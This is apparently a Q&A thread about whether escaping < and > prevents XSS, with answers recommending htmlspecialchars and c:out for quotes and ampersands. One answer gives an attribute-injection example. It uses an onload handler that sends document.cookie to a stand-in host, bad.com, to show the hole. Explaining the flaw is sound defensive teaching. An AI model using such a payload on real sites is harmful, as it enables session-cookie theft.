I want to know if entiting the two marks <
and >
is enough to prevent XSS injections?
And if not, why? And what's the best solution?
I want to know if entiting the two marks <
and >
is enough to prevent XSS injections?
And if not, why? And what's the best solution?
It depends very much on context.
Check out this example, from a typical forum site...
You may hotlink your avatar image. Enter the full URL.
Malicious user enters in input field
http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)
There is no encoding there of less than and greater than, but still a big security hole.
With htmlspecialchars()
, I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding (if necessary) and to ensure it is using the correct character set of your application. Kohana has a great example.
You should also take doublequotes "
, singlequotes '
and ampersands &
into account. If you do that all during displaying/generating the output, then yes, it's enough.
You should only ensure that you do this for any user-controlled input, such as request parameters, request URL, request headers and user-controlled input which is been stored in a datastore.
In PHP you can do that with htmlspecialchars()
and in JSP cou can do that with JSTL <c:out>
.